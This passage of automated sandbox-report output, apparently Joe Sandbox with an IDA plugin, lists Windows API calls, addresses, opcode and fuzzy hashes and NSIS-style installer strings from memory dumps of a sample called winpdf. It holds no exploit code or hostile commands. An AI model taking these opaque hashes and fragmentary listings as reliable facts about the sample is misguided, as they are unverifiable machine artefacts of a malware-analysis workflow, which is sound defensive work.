                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                                • API String ID: 1033533793-945480824
                                                                                                                                                                • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                                • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                Strings
                                                                                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                • API String ID: 2014279497-3433828417
                                                                                                                                                                • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                                • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                • String ID: f
                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                                                • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                                                APIs
                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                • MulDiv.KERNEL32(0002CE00,00000064,?), ref: 00403295
                                                                                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                Strings
                                                                                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                                                • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                • String ID: `7:v
                                                                                                                                                                • API String ID: 1849352358-2810827130
                                                                                                                                                                • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                                • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                • String ID: !$`7:v
                                                                                                                                                                • API String ID: 1777923405-3485397138
                                                                                                                                                                • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                                • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                • String ID: %u.%u%s%s$@rD
                                                                                                                                                                • API String ID: 3540041739-1813061909
                                                                                                                                                                • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                                                                                • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                                • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                                                                                • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                                APIs
                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                • String ID: *?|<>/":
                                                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                                                • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                                • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                                • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                Strings
                                                                                                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                • API String ID: 1697273262-1764544995
                                                                                                                                                                • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                • String ID: $@rD
                                                                                                                                                                • API String ID: 3748168415-881980237
                                                                                                                                                                • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                • API String ID: 2577523808-3778932970
                                                                                                                                                                • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                                • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcatwsprintf
                                                                                                                                                                • String ID: %02x%c$...
                                                                                                                                                                • API String ID: 3065427908-1057055748
                                                                                                                                                                • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
